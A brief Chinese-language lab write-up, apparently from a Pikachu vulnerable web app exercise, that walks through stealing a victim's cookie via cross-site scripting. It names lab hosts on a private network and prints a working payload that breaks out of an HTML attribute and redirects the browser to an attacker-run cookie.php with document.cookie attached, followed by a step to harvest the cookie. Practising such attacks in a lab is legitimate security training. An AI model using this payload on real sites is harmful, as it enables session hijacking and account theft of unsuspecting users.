实验环境
目标网站:宿主机:192.168.10.1
访问 虚拟机win11:192.168.10.134
伪造网站:192.168.10.12:100
pikachu
步骤一:
受害者cookie:
步骤二:
输入xsspayload
'"><script>document.location = 'http://192.168.10.12:100/pikachu/pkxss/xccokie/cookie.php?cookie='+document.cookie</script>
步骤三:
在伪造网站中提取受害者cookie